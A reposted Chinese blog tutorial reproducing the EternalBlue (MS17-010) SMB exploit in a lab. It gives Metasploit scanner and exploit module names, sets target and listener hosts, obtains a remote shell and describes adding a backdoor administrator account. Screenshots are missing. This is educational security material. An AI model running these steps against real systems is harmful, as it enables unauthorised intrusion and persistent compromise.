我是靠谱客的博主 勤恳小白菜,最近开发中收集的这篇文章主要介绍永恒之蓝(ms17-010)漏洞复现,觉得挺不错的,现在分享给大家,希望可以做个参考。

概述

永恒之蓝(EternalBlue)是由美国国家安全局开发的漏洞利用程序,对应微软漏洞编号ms17-010。该漏洞利用工具由一个名为”影子经济人”(Shadow Brokers)的神秘黑客组织于2017年4月14日公开的利用工具之一,该漏洞利用工具针对TCP 445端口(Server Message Block/SMB)的文件分享协议进行攻击,攻击成功后将被用来传播病毒木马。由于利用永恒之蓝漏洞利用工具进行传播病毒木马事件多,影响特大,因此很多时候默认将ms17-010漏洞称为“永恒之蓝”。

由于永恒之蓝利用工具会扫描开放445文件共享端口的Windows机器,所以如果用户开启445端口并且系统未打MS17-010补丁就会在无感状态下被不法分子向系统植入恶意代码。

实验

查看数据库是否开启service postgresql status

dead表示关闭
在这里插入图片描述

开启数据库
在这里插入图片描述

利用kali系统
打开msf
在这里插入图片描述

查看数据库情况,说明连接成功
在这里插入图片描述
搜索ms17_010
使用下面两个模块
在这里插入图片描述
扫描命令use auxiliary/scanner/smb/smb_ms17_010
攻击命令use exploit/windows/smb/ms17_010_eternalblue

关注RHOSTS主机段和THREADS线程,默认为1
在这里插入图片描述
设置扫描主机段
设置线程
在这里插入图片描述
Run开始扫描
用wireshark抓包

在这里插入图片描述

跟踪TCP流,得到靶机基本信息
发现了目标主机的系统和ip在这里插入图片描述
进行攻击
设置攻击目标set rhost
设置监听主机set lhost
在这里插入图片描述
options帮助
在这里插入图片描述

开始攻击exploit
在这里插入图片描述
直接拿到shell
ipconfig
确认是目标主机
在这里插入图片描述

种植后门

创建一个用户
并查看
在这里插入图片描述
加入管理员用户
并查看

在这里插入图片描述
成功植入用户

最后

以上就是勤恳小白菜为你收集整理的永恒之蓝(ms17-010)漏洞复现的全部内容,希望文章能够帮你解决永恒之蓝(ms17-010)漏洞复现所遇到的程序开发问题。

如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。

本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
点赞(37)

评论列表共有 0 条评论

立即
投稿
返回
顶部